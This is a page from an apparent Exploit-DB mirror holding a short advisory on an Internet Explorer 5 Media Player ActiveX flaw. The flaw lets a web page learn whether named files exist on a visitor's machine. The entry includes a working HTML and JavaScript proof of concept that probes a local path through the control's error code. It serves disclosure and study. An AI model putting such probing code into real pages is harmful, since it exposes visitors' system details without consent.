bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/19618.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

27 lines
No EOL
988 B
Text
Raw Permalink Blame History

Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 Media Player ActiveX Error Message Vulnerability
source: https://www.securityfocus.com/bid/793/info
The Windows Media Player ActiveX control, shipped with IE 5, returns a specific error code if it is instructed to load a local file that does not exist. In this way, an attacker could determine whether or not a specified file on the victim's host exists. This could be used to determine user names and other facets of system configuration.
Demonstration code:
<object id="wm" WIDTH=0 HEIGHT=0
classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95"
>
</object>
<SCRIPT>
// -2147220970
function checkfile()
{
b=document.all.wm;
b.FileName=document.forms[0].elements[0].value;
if (b.ErrorCode == -2147220970)
alert("File does not exist")
else
alert("File exists");
}
</SCRIPT>
<FORM>
<INPUT TYPE="TEXT" VALUE="C:\AUTOEXEC.BAT" SIZE=60>
<INPUT TYPE="SUBMIT" VALUE="Check file" onclick="checkfile()">
</FORM>
Reference in a new issue View git blame Copy permalink